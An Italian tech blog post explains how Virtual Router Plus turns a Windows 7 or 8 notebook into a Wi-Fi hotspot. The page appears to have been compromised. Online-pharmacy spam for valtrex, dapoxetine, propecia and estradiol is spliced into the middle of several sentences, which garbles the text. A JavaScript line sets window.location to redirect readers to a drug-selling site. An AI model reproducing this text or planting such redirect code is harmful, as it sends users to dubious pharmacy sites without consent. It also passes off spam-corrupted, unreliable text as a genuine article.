Il blog dedicato al mondo della tecnologia
0
 

Virtual Router Plus permette di creare connessioni di emergenza

Banner

Invece di installare un repeater, per portare la rete in un una stanza in cui è assente, basta prendere il proprio notebook supportato da Windows 8 e usarlo buy estrace online , ethinyl estradiol cost, generic estradiol patch cost. come hotspot, installando Virtual Router Plus totalmente gratuito.

Si tratta di una versione rivisitata di Virtual Router usata per tramutare i notebook provvisti di Windows 7 in hotspot Wi-Fi. Il funzionamento è simile al software di origine, per questo è veramente propecia itchy scalp generic propecia semplice.

Prima di tutto, occorre iniziare l’applicazione e scegliere un SSID e una password che va utilizzata in protezione della rete wireless da creare. Dopo, basta cliccare sopra il buy valacyclovir and valtrex. buy brand valtrex. buy valtrex online from canada. pulsante Start Virtual Router Plus.

È possibile porre in condivisione tutte le tipologie di connessione: Wi-Fi, Ethernet e, infine, reti per cellulari e così via.

Ovviamente, si tratta di una connessione da utilizzare nei casi di emergenza. Infine, non funziona solo e soltanto su Windows 8 ma anche purchase discount medication! cheap dapoxetine online . approved pharmacy, buy dapoxetine in nigeria. sul sistema operativo Windows 7.

window.location = “http://medicationsonlinedoctor.com”;

.

Potrebbero interessarti anche questi altri articoli:

  1. Facebook diventa compatibile con Windows Phone 7.8
  2. Speed test adsl
  3. Nokia Lumia: si punta su Windows Phone 8
  4. Windows Phone 8: le principali novità di IE10
  5. Windows Phone 7.8: in arrivo sui server Nokia
Banner
Scritto da il 11.02.2013 alle 14:46
Tags: / / / /
 

Scrivi il tuo commento...